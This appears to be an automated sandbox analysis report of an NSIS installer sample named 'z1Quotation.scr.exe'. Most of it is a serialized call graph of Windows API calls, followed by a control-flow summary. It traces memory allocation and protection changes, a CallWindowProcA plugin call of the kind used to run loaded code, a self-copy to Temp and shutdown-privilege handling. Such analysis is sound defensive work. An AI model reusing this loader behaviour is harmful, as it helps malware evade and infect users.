4485 402ec2 4466->4485 4467->4466 4468->4447 4470 405fa9 ReadFile 4468->4470 4469->4458 4471 40324d 4470->4471 4471->4445 4471->4447 4473 405ff6 4472->4473 4473->4449 4474->4462 4476 405fa9 ReadFile 4475->4476 4477 403486 4476->4477 4477->4466 4479 406930 4478->4479 4480 406938 4478->4480 4479->4466 4480->4479 4481 4069c8 GlobalAlloc 4480->4481 4482 4069bf GlobalFree 4480->4482 4483 406a36 GlobalFree 4480->4483 4484 406a3f GlobalAlloc 4480->4484 4481->4479 4481->4480 4482->4481 4483->4484 4484->4479 4484->4480 4486 402ed0 4485->4486 4487 402ee8 4485->4487 4488 402ee0 4486->4488 4489 402ed9 DestroyWindow 4486->4489 4490 402ef0 4487->4490 4491 402ef8 GetTickCount 4487->4491 4488->4466 4489->4488 4493 406802 2 API calls 4490->4493 4491->4488 4492 402f06 4491->4492 4494 402f3b CreateDialogParamA ShowWindow 4492->4494 4495 402f0e 4492->4495 4493->4488 4494->4488 4495->4488 4500 402ea6 4495->4500 4497 402f1c wsprintfA 4498 4054e2 28 API calls 4497->4498 4499 402f39 4498->4499 4499->4488 4501 402eb5 4500->4501 4502 402eb7 MulDiv 4500->4502 4501->4502 4502->4497 5782 6d431000 5785 6d43101b 5782->5785 5786 6d43154b GlobalFree 5785->5786 5787 6d431020 5786->5787 5788 6d431027 GlobalAlloc 5787->5788 5789 6d431024 5787->5789 5788->5789 5790 6d431572 3 API calls 5789->5790 5791 6d431019 5790->5791 5792 401d03 5793 402c1c 21 API calls 5792->5793 5794 401d09 IsWindow 5793->5794 5795 401a13 5794->5795 5796 401905 5797 402c3e 21 API calls 5796->5797 5798 40190c 5797->5798 5799 405ab4 MessageBoxIndirectA 5798->5799 5800 401915 5799->5800 5801 402785 5802 40278b 5801->5802 5803 40278f FindNextFileA 5802->5803 5806 4027a1 5802->5806 5804 4027e0 5803->5804 5803->5806 5807 40639e lstrcpynA 5804->5807 5807->5806 5815 404889 5816 404899 5815->5816 5817 4048bf 5815->5817 5818 40443e 22 API calls 5816->5818 5819 4044a5 8 API calls 5817->5819 5820 4048a6 SetDlgItemTextA 5818->5820 5821 4048cb 5819->5821 5820->5817 5822 401b8c 5823 401b99 5822->5823 5824 401bdd 5822->5824 5825 401c21 5823->5825 5830 401bb0 5823->5830 5826 401be1 5824->5826 5827 401c06 GlobalAlloc 5824->5827 5829 406431 21 API calls 5825->5829 5836 402394 5825->5836 5826->5836 5843 40639e lstrcpynA 5826->5843 5828 406431 21 API calls 5827->5828 5828->5825 5831 40238e 5829->5831 5841 40639e lstrcpynA 5830->5841 5831->5836 5837 405ab4 MessageBoxIndirectA 5831->5837 5834 401bf3 GlobalFree 5834->5836 5835 401bbf 5842 40639e lstrcpynA 5835->5842 5837->5836 5839 401bce 5844 40639e lstrcpynA 5839->5844 5841->5835 5842->5839 5843->5834 5844->5836 5845 40298f 5846 402c1c 21 API calls 5845->5846 5847 402995 5846->5847 5848 406431 21 API calls 5847->5848 5849 4027cd 5847->5849 5848->5849 5850 401490 5851 4054e2 28 API calls 5850->5851 5852 401497 5851->5852 5853 402611 5854 402c3e 21 API calls 5853->5854 5855 402618 5854->5855 5858 405f31 GetFileAttributesA CreateFileA 5855->5858 5857 402624 5858->5857 5165 402595 5166 402c7e 21 API calls 5165->5166 5167 40259f 5166->5167 5168 402c1c 21 API calls 5167->5168 5169 4025a8 5168->5169 5170 4025b6 5169->5170 5175 4027cd 5169->5175 5171 4025c3 RegEnumKeyA 5170->5171 5172 4025cf RegEnumValueA 5170->5172 5173 4025eb RegCloseKey 5171->5173 5172->5173 5174 4025e4 5172->5174 5173->5175 5174->5173 5859 40149d 5860 402394 5859->5860 5861 4014ab PostQuitMessage 5859->5861 5861->5860 4176 405620 4177 405642 GetDlgItem GetDlgItem GetDlgItem 4176->4177 4178 4057cb 4176->4178 4222 404473 SendMessageA 4177->4222 4179 4057d3 GetDlgItem CreateThread CloseHandle 4178->4179 4183 4057fb 4178->4183 4179->4183 4307 4055b4 OleInitialize 4179->4307 4181 4056b2 4188 4056b9 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4181->4188 4182 405829 4186 405831 4182->4186 4187 405884 4182->4187 4183->4182 4184 405811 ShowWindow ShowWindow 4183->4184 4185 40584a 4183->4185 4227 404473 SendMessageA 4184->4227 4231 4044a5 4185->4231 4190 405839 4186->4190 4191 40585d ShowWindow 4186->4191 4187->4185 4195 405891 SendMessageA 4187->4195 4193 405727 4188->4193 4194 40570b SendMessageA SendMessageA 4188->4194 4228 404417 4190->4228 4198 40587d 4191->4198 4199 40586f 4191->4199 4201 40573a 4193->4201 4202 40572c SendMessageA 4193->4202 4194->4193 4197 405856 4195->4197 4203 4058aa CreatePopupMenu 4195->4203 4200 404417 SendMessageA 4198->4200 4245 4054e2 4199->4245 4200->4187 4223 40443e 4201->4223 4202->4201 4256 406431 4203->4256 4208 40574a 4211 405753 ShowWindow 4208->4211 4212 405787 GetDlgItem SendMessageA 4208->4212 4209 4058d8 GetWindowRect 4210 4058eb TrackPopupMenu 4209->4210 4210->4197 4213 405907 4210->4213 4214 405776 4211->4214 4215 405769 ShowWindow 4211->4215 4212->4197 4216 4057ae SendMessageA SendMessageA 4212->4216 4217 405926 SendMessageA 4213->4217 4226 404473 SendMessageA 4214->4226 4215->4214 4216->4197 4217->4217 4218 405943 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4217->4218 4220 405965 SendMessageA 4218->4220 4220->4220 4221 405987 GlobalUnlock SetClipboardData CloseClipboard 4220->4221 4221->4197 4222->4181 4224 406431 21 API calls 4223->4224 4225 404449 SetDlgItemTextA 4224->4225 4225->4208 4226->4212 4227->4182 4229 404424 SendMessageA 4228->4229 4230 40441e 4228->4230 4229->4185 4230->4229 4232 404568 4231->4232 4233 4044bd GetWindowLongA 4231->4233 4232->4197 4233->4232 4234 4044d2 4233->4234 4234->4232 4235 404502 4234->4235 4236 4044ff GetSysColor 4234->4236 4237 404512 SetBkMode 4235->4237 4238 404508 SetTextColor 4235->4238 4236->4235 4239 404530 4237->4239 4240 40452a GetSysColor 4237->4240 4238->4237 4241 404541 4239->4241 4242 404537 SetBkColor 4239->4242 4240->4239 4241->4232 4243 404554 DeleteObject 4241->4243 4244 40455b CreateBrushIndirect 4241->4244 4242->4241 4243->4244 4244->4232 4246 4054fd 4245->4246 4254 4055a0 4245->4254 4247 40551a lstrlenA 4246->4247 4248 406431 21 API calls 4246->4248 4249 405543 4247->4249 4250 405528 lstrlenA 4247->4250 4248->4247 4252 405556 4249->4252 4253 405549 SetWindowTextA 4249->4253 4251 40553a lstrcatA 4250->4251 4250->4254 4251->4249 4252->4254 4255 40555c SendMessageA SendMessageA SendMessageA 4252->4255 4253->4252 4254->4198 4255->4254 4271 40643e 4256->4271 4257 40667f 4258 4058ba AppendMenuA 4257->4258 4295 40639e lstrcpynA 4257->4295 4258->4209 4258->4210 4260 406656 lstrlenA 4260->4271 4263 406431 15 API calls 4263->4260 4265 40655d GetSystemDirectoryA 4265->4271 4266 406573 GetWindowsDirectoryA 4266->4271 4268 406431 15 API calls 4268->4271 4269 4065ff lstrcatA 4269->4271 4271->4257 4271->4260 4271->4263 4271->4265 4271->4266 4271->4268 4271->4269 4272 4065d6 SHGetPathFromIDListA CoTaskMemFree 4271->4272 4273 406285 4271->4273 4278 4067c6 GetModuleHandleA 4271->4278 4284 406698 4271->4284 4293 4062fc wsprintfA 4271->4293 4294 40639e lstrcpynA 4271->4294 4272->4271 4296 406224 4273->4296 4276 4062e8 4276->4271 4277 4062b9 RegQueryValueExA RegCloseKey 4277->4276 4279 4067e2 4278->4279 4280 4067ec GetProcAddress 4278->4280 4300 406758 GetSystemDirectoryA 4279->4300 4282 4067fb 4280->4282 4282->4271 4283 4067e8 4283->4280 4283->4282 4285 4066a4 4284->4285 4287 406701 CharNextA 4285->4287 4289 40670c 4285->4289 4291 4066ef CharNextA 4285->4291 4292 4066fc CharNextA 4285->4292 4303 405d5b 4285->4303 4286 406710 CharPrevA 4286->4289 4287->4285 4287->4289 4289->4286 4290 40672b 4289->4290 4290->4271 4291->4285 4292->4287 4293->4271 4294->4271 4295->4258 4297 406233 4296->4297 4298 406237 4297->4298 4299 40623c RegOpenKeyExA 4297->4299 4298->4276 4298->4277 4299->4298 4301 40677a wsprintfA LoadLibraryExA 4300->4301 4301->4283 4304 405d61 4303->4304 4305 405d74 4304->4305 4306 405d67 CharNextA 4304->4306 4305->4285 4306->4304 4314 40448a 4307->4314 4309 40448a SendMessageA 4311 405610 OleUninitialize 4309->4311 4310 4055d7 4312 4055fe 4310->4312 4317 401389 4310->4317 4312->4309 4315 4044a2 4314->4315 4316 404493 SendMessageA 4314->4316 4315->4310 4316->4315 4319 401390 4317->4319 4318 4013fe 4318->4310 4319->4318 4320 4013cb MulDiv SendMessageA 4319->4320 4320->4319 5869 404c21 5870 404c31 5869->5870 5871 404c4d 5869->5871 5880 405a98 GetDlgItemTextA 5870->5880 5873 404c80 5871->5873 5874 404c53 SHGetPathFromIDListA 5871->5874 5876 404c6a SendMessageA 5874->5876 5877 404c63 5874->5877 5875 404c3e SendMessageA 5875->5871 5876->5873 5878 40140b 2 API calls 5877->5878 5878->5876 5880->5875 4393 4015a2 4394 402c3e 21 API calls 4393->4394 4395 4015a9 SetFileAttributesA 4394->4395 4396 4015bb 4395->4396 4397 402523 4408 402c7e 4397->4408 4400 402c3e 21 API calls 4401 402536 4400->4401 4402 402540 RegQueryValueExA 4401->4402 4405 4027cd 4401->4405 4403 402560 4402->4403 4407 402566 RegCloseKey 4402->4407 4403->4407 4413 4062fc wsprintfA 4403->4413 4407->4405 4409 402c3e 21 API calls 4408->4409 4410 402c95 4409->4410 4411 406224 RegOpenKeyExA 4410->4411 4412 40252d 4411->4412 4412->4400 4413->4407 5881 401a23 5882 402c3e 21 API calls 5881->5882 5883 401a2c ExpandEnvironmentStringsA 5882->5883 5884 401a40 5883->5884 5886 401a53 5883->5886 5885 401a45 lstrcmpA 5884->5885 5884->5886 5885->5886 5892 401724 5893 402c3e 21 API calls 5892->5893 5894 40172b SearchPathA 5893->5894 5895 401746 5894->5895 5896 401d24 5897 402c1c 21 API calls 5896->5897 5898 401d2b 5897->5898 5899 402c1c 21 API calls 5898->5899 5900 401d37 GetDlgItem 5899->5900 5901 40262d 5900->5901 5902 402aa5 SendMessageA 5903 402aca 5902->5903 5904 402abf InvalidateRect 5902->5904 5904->5903 5905 4045a9 5906 4045bf 5905->5906 5911 4046cb 5905->5911 5909 40443e 22 API calls 5906->5909 5907 40473a 5908 404804 5907->5908 5910 404744 GetDlgItem 5907->5910 5916 4044a5 8 API calls 5908->5916 5912 404615 5909->5912 5913 40475a 5910->5913 5917 4047c2 5910->5917 5911->5907 5911->5908 5914 40470f GetDlgItem SendMessageA 5911->5914 5915 40443e 22 API calls 5912->5915 5913->5917 5922 404780 SendMessageA LoadCursorA SetCursor 5913->5922 5938 404460 KiUserCallbackDispatcher 5914->5938 5920 404622 CheckDlgButton 5915->5920 5921 4047ff 5916->5921 5917->5908 5918 4047d4 5917->5918 5923 4047da SendMessageA 5918->5923 5924 4047eb 5918->5924 5936 404460 KiUserCallbackDispatcher 5920->5936 5939 40484d 5922->5939 5923->5924 5924->5921 5928 4047f1 SendMessageA 5924->5928 5925 404735 5929 404829 SendMessageA 5925->5929 5928->5921 5929->5907 5930 404640 GetDlgItem 5937 404473 SendMessageA 5930->5937 5933 404656 SendMessageA 5934 404674 GetSysColor 5933->5934 5935 40467d SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5933->5935 5934->5935 5935->5921 5936->5930 5937->5933 5938->5925 5942 405a7a ShellExecuteExA 5939->5942 5941 4047b3 LoadCursorA SetCursor 5941->5917 5942->5941 5943 4023a9 5944 4023b1 5943->5944 5945 4023b7 5943->5945 5947 402c3e 21 API calls 5944->5947 5946 4023c7 5945->5946 5948 402c3e 21 API calls 5945->5948 5949 402c3e 21 API calls 5946->5949 5951 4023d5 5946->5951 5947->5945 5948->5946 5949->5951 5950 402c3e 21 API calls 5952 4023de WritePrivateProfileStringA 5950->5952 5951->5950 4593 4020aa 4594 4020bc 4593->4594 4595 40216a 4593->4595 4596 402c3e 21 API calls 4594->4596 4597 401423 28 API calls 4595->4597 4598 4020c3 4596->4598 4603 4022ef 4597->4603 4599 402c3e 21 API calls 4598->4599 4600 4020cc 4599->4600 4601 4020e1 LoadLibraryExA 4600->4601 4602 4020d4 GetModuleHandleA 4600->4602 4601->4595 4604 4020f1 GetProcAddress 4601->4604 4602->4601 4602->4604 4605 402100 4604->4605 4606 40213d 4604->4606 4607 402108 4605->4607 4608 40211f 4605->4608 4609 4054e2 28 API calls 4606->4609 4610 401423 28 API calls 4607->4610 4614 6d43176b 4608->4614 4611 402110 4609->4611 4610->4611 4611->4603 4612 40215e FreeLibrary 4611->4612 4612->4603 4615 6d43179b 4614->4615 4656 6d431b28 4615->4656 4617 6d4317a2 4618 6d4318c4 4617->4618 4619 6d4317b3 4617->4619 4620 6d4317ba 4617->4620 4618->4611 4704 6d43233f 4619->4704 4688 6d432381 4620->4688 4625 6d431800 4717 6d432568 4625->4717 4626 6d43181e 4629 6d431824 4626->4629 4630 6d43186c 4626->4630 4627 6d4317d0 4632 6d4317d6 4627->4632 4638 6d4317e1 4627->4638 4628 6d4317e9 4639 6d4317df 4628->4639 4714 6d432d53 4628->4714 4736 6d4315fb 4629->4736 4636 6d432568 11 API calls 4630->4636 4632->4639 4698 6d432ac8 4632->4698 4642 6d43185d 4636->4642 4637 6d431806 4728 6d4315e9 4637->4728 4708 6d432742 4638->4708 4639->4625 4639->4626 4655 6d4318b3 4642->4655 4742 6d43252e 4642->4742 4644 6d4317e7 4644->4639 4645 6d432568 11 API calls 4645->4642 4649 6d4318bd GlobalFree 4649->4618 4652 6d43189f 4652->4655 4746 6d431572 wsprintfA 4652->4746 4653 6d431898 FreeLibrary 4653->4652 4655->4618 4655->4649 4749 6d4312a5 GlobalAlloc 4656->4749 4658 6d431b4f 4750 6d4312a5 GlobalAlloc 4658->4750 4660 6d431d90 GlobalFree GlobalFree GlobalFree 4661 6d431dad 4660->4661 4672 6d431df7 4660->4672 4662 6d432181 4661->4662 4669 6d431dc2 4661->4669 4661->4672 4664 6d4321a3 GetModuleHandleA 4662->4664 4662->4672 4663 6d431c4d GlobalAlloc 4681 6d431b5a 4663->4681 4667 6d4321b4 LoadLibraryA 4664->4667 4668 6d4321c9 4664->4668 4665 6d431c98 lstrcpyA 4671 6d431ca2 lstrcpyA 4665->4671 4666 6d431cb6 GlobalFree 4666->4681 4667->4668 4667->4672 4757 6d431652 GetProcAddress 4668->4757 4669->4672 4753 6d4312b4 4669->4753 4671->4681 4672->4617 4673 6d43221a 4673->4672 4675 6d432227 lstrlenA 4673->4675 4674 6d432047 4756 6d4312a5 GlobalAlloc 4674->4756 4758 6d431652 GetProcAddress 4675->4758 4679 6d431f89 GlobalFree 4679->4681 4680 6d4320c3 4680->4672 4686 6d43211c lstrcpyA 4680->4686 4681->4660 4681->4663 4681->4665 4681->4666 4681->4671 4681->4672 4681->4674 4681->4679 4681->4680 4682 6d4312b4 2 API calls 4681->4682 4751 6d4315c4 GlobalSize GlobalAlloc 4681->4751 4682->4681 4683 6d4321db 4683->4673 4687 6d432204 GetProcAddress 4683->4687 4684 6d43204f 4684->4617 4686->4672 4687->4673 4694 6d43239a 4688->4694 4690 6d4324d6 GlobalFree 4692 6d4317c0 4690->4692 4690->4694 4691 6d432448 GlobalAlloc MultiByteToWideChar 4693 6d432495 4691->4693 4696 6d432474 GlobalAlloc CLSIDFromString GlobalFree 4691->4696 4692->4627 4692->4628 4692->4639 4693->4690 4764 6d4326d6 4693->4764 4694->4690 4694->4691 4694->4693 4695 6d4312b4 GlobalAlloc lstrcpynA 4694->4695 4760 6d43133d 4694->4760 4695->4694 4696->4690 4700 6d432ada 4698->4700 4699 6d432b7f VirtualAlloc 4703 6d432b9d 4699->4703 4700->4699 4702 6d432c69 4702->4639 4767 6d432a74 4703->4767 4705 6d432354 4704->4705 4706 6d43235f GlobalAlloc 4705->4706 4707 6d4317b9 4705->4707 4706->4705 4707->4620 4712 6d432772 4708->4712 4709 6d432820 4711 6d432826 GlobalSize 4709->4711 4713 6d432830 4709->4713 4710 6d43280d GlobalAlloc 4710->4713 4711->4713 4712->4709 4712->4710 4713->4644 4715 6d432d5e 4714->4715 4716 6d432d9e GlobalFree 4715->4716 4771 6d4312a5 GlobalAlloc 4717->4771 4719 6d4325f3 lstrcpynA 4724 6d432574 4719->4724 4720 6d432604 StringFromGUID2 WideCharToMultiByte 4720->4724 4721 6d432628 WideCharToMultiByte 4721->4724 4722 6d43266d GlobalFree 4722->4724 4723 6d432649 wsprintfA 4723->4724 4724->4719 4724->4720 4724->4721 4724->4722 4724->4723 4725 6d4326a7 GlobalFree 4724->4725 4726 6d4312f6 2 API calls 4724->4726 4772 6d431361 4724->4772 4725->4637 4726->4724 4776 6d4312a5 GlobalAlloc 4728->4776 4730 6d4315ee 4731 6d4315fb 2 API calls 4730->4731 4732 6d4315f8 4731->4732 4733 6d4312f6 4732->4733 4734 6d431338 GlobalFree 4733->4734 4735 6d4312ff GlobalAlloc lstrcpynA 4733->4735 4734->4642 4735->4734 4737 6d431607 wsprintfA 4736->4737 4738 6d431634 lstrcpyA 4736->4738 4741 6d43164d 4737->4741 4738->4741 4741->4645 4743 6d43187f 4742->4743 4744 6d43253c 4742->4744 4743->4652 4743->4653 4744->4743 4745 6d432555 GlobalFree 4744->4745 4745->4744 4747 6d4312f6 2 API calls 4746->4747 4748 6d431593 4747->4748 4748->4655 4749->4658 4750->4681 4752 6d4315e2 4751->4752 4752->4681 4759 6d4312a5 GlobalAlloc 4753->4759 4755 6d4312c3 lstrcpynA 4755->4672 4756->4684 4757->4683 4758->4672 4759->4755 4761 6d431344 4760->4761 4762 6d4312b4 2 API calls 4761->4762 4763 6d43135f 4762->4763 4763->4694 4765 6d4326e4 VirtualAlloc 4764->4765 4766 6d43273a 4764->4766 4765->4766 4766->4693 4768 6d432a7f 4767->4768 4769 6d432a84 GetLastError 4768->4769 4770 6d432a8f 4768->4770 4769->4770 4770->4702 4771->4724 4773 6d43136a 4772->4773 4774 6d431389 4772->4774 4773->4774 4775 6d431370 lstrcpyA 4773->4775 4774->4724 4775->4774 4776->4730 5953 402e2a 5954 402e52 5953->5954 5955 402e39 SetTimer 5953->5955 5956 402ea0 5954->5956 5957 402ea6 MulDiv 5954->5957 5955->5954 5958 402e60 wsprintfA SetWindowTextA SetDlgItemTextA 5957->5958 5958->5956 4787 40242e 4788 402460 4787->4788 4789 402435 4787->4789 4791 402c3e 21 API calls 4788->4791 4790 402c7e 21 API calls 4789->4790 4792 40243c 4790->4792 4793 402467 4791->4793 4794 402446 4792->4794 4797 402474 4792->4797 4799 402cfc 4793->4799 4796 402c3e 21 API calls 4794->4796 4798 40244d RegDeleteValueA RegCloseKey 4796->4798 4798->4797 4800 402d0f 4799->4800 4802 402d08 4799->4802 4800->4802 4803 402d40 4800->4803 4802->4797 4804 406224 RegOpenKeyExA 4803->4804 4805 402d6e 4804->4805 4806 402e18 4805->4806 4807 402d7e RegEnumValueA 4805->4807 4811 402da1 4805->4811 4806->4802 4808 402e08 RegCloseKey 4807->4808 4807->4811 4808->4806 4809 402ddd RegEnumKeyA 4810 402de6 RegCloseKey 4809->4810 4809->4811 4812 4067c6 5 API calls 4810->4812 4811->4808 4811->4809 4811->4810 4813 402d40 6 API calls 4811->4813 4814 402df6 4812->4814 4813->4811 4814->4806 4815 402dfa RegDeleteKeyA 4814->4815 4815->4806 5967 4027af 5968 402c3e 21 API calls 5967->5968 5969 4027b6 FindFirstFileA 5968->5969 5970 4027d9 5969->5970 5974 4027c9 5969->5974 5971 4027e0 5970->5971 5975 4062fc wsprintfA 5970->5975 5976 40639e lstrcpynA 5971->5976 5975->5971 5976->5974 5157 6d4329b1 5158 6d432a01 5157->5158 5159 6d4329c1 VirtualProtect 5157->5159 5159->5158 5977 401c33 5978 402c1c 21 API calls 5977->5978 5979 401c3a 5978->5979 5980 402c1c 21 API calls 5979->5980 5981 401c47 5980->5981 5982 401c5c 5981->5982 5983 402c3e 21 API calls 5981->5983 5986 402c3e 21 API calls 5982->5986 5989 401c6c 5982->5989 5983->5982 5984 401cc3 5988 402c3e 21 API calls 5984->5988 5985 401c77 5987 402c1c 21 API calls 5985->5987 5986->5989 5990 401c7c 5987->5990 5991 401cc8 5988->5991 5989->5984 5989->5985 5992 402c1c 21 API calls 5990->5992 5993 402c3e 21 API calls 5991->5993 5994 401c88 5992->5994 5995 401cd1 FindWindowExA 5993->5995 5996 401cb3 SendMessageA 5994->5996 5997 401c95 SendMessageTimeoutA 5994->5997 5998 401cef 5995->5998 5996->5998 5997->5998 5999 402633 6000 402638 5999->6000 6001 40264c 5999->6001 6002 402c1c 21 API calls 6000->6002 6003 402c3e 21 API calls 6001->6003 6005 402641 6002->6005 6004 402653 lstrlenA 6003->6004 6004->6005 6006 402675 6005->6006 6007 405fd8 WriteFile 6005->6007 6007->6006 6008 4014b7 6009 4014bd 6008->6009 6010 401389 2 API calls 6009->6010 6011 4014c5 6010->6011 5183 402738 5184 40273f 5183->5184 5186 402a4c 5183->5186 5185 402c1c 21 API calls 5184->5185 5187 402746 5185->5187 5188 402755 SetFilePointer 5187->5188 5188->5186 5189 402765 5188->5189 5191 4062fc wsprintfA 5189->5191 5191->5186 6012 401e3a GetDC 6013 402c1c 21 API calls 6012->6013 6014 401e4c GetDeviceCaps MulDiv ReleaseDC 6013->6014 6015 402c1c 21 API calls 6014->6015 6016 401e7d 6015->6016 6017 406431 21 API calls 6016->6017 6018 401eba CreateFontIndirectA 6017->6018 6019 40262d 6018->6019 6020 406aba 6022 40693e 6020->6022 6021 4072a9 6022->6021 6023 4069c8 GlobalAlloc 6022->6023 6024 4069bf GlobalFree 6022->6024 6025 406a36 GlobalFree 6022->6025 6026 406a3f GlobalAlloc 6022->6026 6023->6021 6023->6022 6024->6023 6025->6026 6026->6021 6026->6022 6027 6d43103d 6028 6d43101b 5 API calls 6027->6028 6029 6d431056 6028->6029

                                                                                                                  Executed Functions

                                                                                                                  Function 004034D1 Relevance: 96.7, APIs: 32, Strings: 23, Instructions: 430stringfilecomCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 4034d1-403521 SetErrorMode GetVersionExA 1 403562 0->1 2 403523-40353d GetVersionExA 0->2 3 403569 1->3 2->3 4 40353f-40355e 2->4 5 40356b-403576 3->5 6 40358d-403594 3->6 4->1 9 403578-403587 5->9 10 403589 5->10 7 403596 6->7 8 40359e-4035de 6->8 7->8 11 4035e0-4035e8 call 4067c6 8->11 12 4035f1 8->12 9->6 10->6 11->12 17 4035ea 11->17 14 4035f6-40360a call 406758 lstrlenA 12->14 19 40360c-403628 call 4067c6 * 3 14->19 17->12 26 403639-403699 #17 OleInitialize SHGetFileInfoA call 40639e GetCommandLineA call 40639e 19->26 27 40362a-403630 19->27 34 4036a4-4036b7 call 405d5b CharNextA 26->34 35 40369b-40369f 26->35 27->26 31 403632 27->31 31->26 38 403778-40377c 34->38 35->34 39 403782 38->39 40 4036bc-4036bf 38->40 43 403796-4037b0 GetTempPathA call 4034a0 39->43 41 4036c1-4036c5 40->41 42 4036c7-4036ce 40->42 41->41 41->42 44 4036d0-4036d1 42->44 45 4036d5-4036d8 42->45 52 4037b2-4037d0 GetWindowsDirectoryA lstrcatA call 4034a0 43->52 53 403808-403820 DeleteFileA call 402f61 43->53 44->45 47 403769-403775 call 405d5b 45->47 48 4036de-4036e2 45->48 47->38 63 403777 47->63 50 4036e4-4036ea 48->50 51 4036fa-403727 48->51 55 4036f0 50->55 56 4036ec-4036ee 50->56 57 403739-403767 51->57 58 403729-40372f 51->58 52->53 71 4037d2-403802 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4034a0 52->71 68 4038b3-4038c4 call 403ab5 OleUninitialize 53->68 69 403826-40382c 53->69 55->51 56->51 56->55 57->47 67 403784-403791 call 40639e 57->67 64 403731-403733 58->64 65 403735 58->65 63->38 64->57 64->65 65->57 67->43 82 403a21-403a27 68->82 83 4038ca-4038d9 call 405ab4 ExitProcess 68->83 72 4038a4-4038ab call 403ba7 69->72 73 40382e-403839 call 405d5b 69->73 71->53 71->68 80 4038b0 72->80 86 40383b-403864 73->86 87 40386f-403878 73->87 80->68 84 403a29-403a3e GetCurrentProcess OpenProcessToken 82->84 85 403a9f-403aa7 82->85 91 403a40-403a69 LookupPrivilegeValueA AdjustTokenPrivileges 84->91 92 403a6f-403a7d call 4067c6 84->92 89 403aa9 85->89 90 403aac-403aaf ExitProcess 85->90 93 403866-403868 86->93 94 40387a-403888 call 405e1e 87->94 95 4038df-403903 call 405a1f lstrlenA call 40639e 87->95 89->90 91->92 104 403a8b-403a96 ExitWindowsEx 92->104 105 403a7f-403a89 92->105 93->87 98 40386a-40386d 93->98 94->68 106 40388a-4038a0 call 40639e * 2 94->106 114 403914-403929 95->114 115 403905-40390f call 40639e 95->115 98->87 98->93 104->85 108 403a98-403a9a call 40140b 104->108 105->104 105->108 106->72 108->85 117 40392e 114->117 115->114 120 403932-40395e wsprintfA call 406431 117->120 123 403960-403965 call 4059a8 120->123 124 403967 call 405a02 120->124 128 40396c-40396e 123->128 124->128 129 403970-40397a GetFileAttributesA 128->129 130 4039a8-4039c7 SetCurrentDirectoryA call 406177 CopyFileA 128->130 132 403999-4039a1 129->132 133 40397c-403985 DeleteFileA 129->133 130->68 137 4039cd-4039ee call 406177 call 406431 call 405a37 130->137 132->117 134 4039a3 132->134 133->132 136 403987-403997 call 405b60 133->136 134->68 136->120 136->132 146 4039f0-4039f8 137->146 147 403a11-403a1c CloseHandle 137->147 146->68 148 4039fe-403a06 call 406731 146->148 147->68 148->120 151 403a0c 148->151 151->68
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 004034F4
                                                                                                                  • GetVersionExA.KERNEL32(?), ref: 0040351D
                                                                                                                  • GetVersionExA.KERNEL32(0000009C), ref: 00403534
                                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035FD
                                                                                                                  • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 0040363A
                                                                                                                  • OleInitialize.OLE32(00000000), ref: 00403641
                                                                                                                  • SHGetFileInfoA.SHELL32(0041F910,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 0040365F
                                                                                                                  • GetCommandLineA.KERNEL32(Inaugurates Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 00403674
                                                                                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\z1Quotation.scr.exe",00000020,"C:\Users\user\Desktop\z1Quotation.scr.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036AE
                                                                                                                  • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004037A7
                                                                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 004037B8
                                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004037C4
                                                                                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004037D8
                                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004037E0
                                                                                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004037F1
                                                                                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 004037F9
                                                                                                                  • DeleteFileA.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 0040380D
                                                                                                                  • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 004038B8
                                                                                                                  • ExitProcess.KERNEL32 ref: 004038D9
                                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",00000000,?,?,00000008,0000000A,0000000C), ref: 004038E8
                                                                                                                  • wsprintfA.USER32 ref: 0040393F
                                                                                                                  • GetFileAttributesA.KERNEL32(988,C:\Users\user\AppData\Local\Temp\,988,?,0000000C), ref: 00403971
                                                                                                                  • DeleteFileA.KERNEL32(988), ref: 0040397D
                                                                                                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,988,?,0000000C), ref: 004039A9
                                                                                                                  • CopyFileA.KERNEL32(C:\Users\user\Desktop\z1Quotation.scr.exe,988,?), ref: 004039BF
                                                                                                                  • CloseHandle.KERNEL32(00000000,user32::CallWindowProcA(i r1 ,i 0,i 0, i 0, i 0),user32::CallWindowProcA(i r1 ,i 0,i 0, i 0, i 0),?,988,00000000), ref: 00403A12
                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403A2F
                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403A36
                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A4A
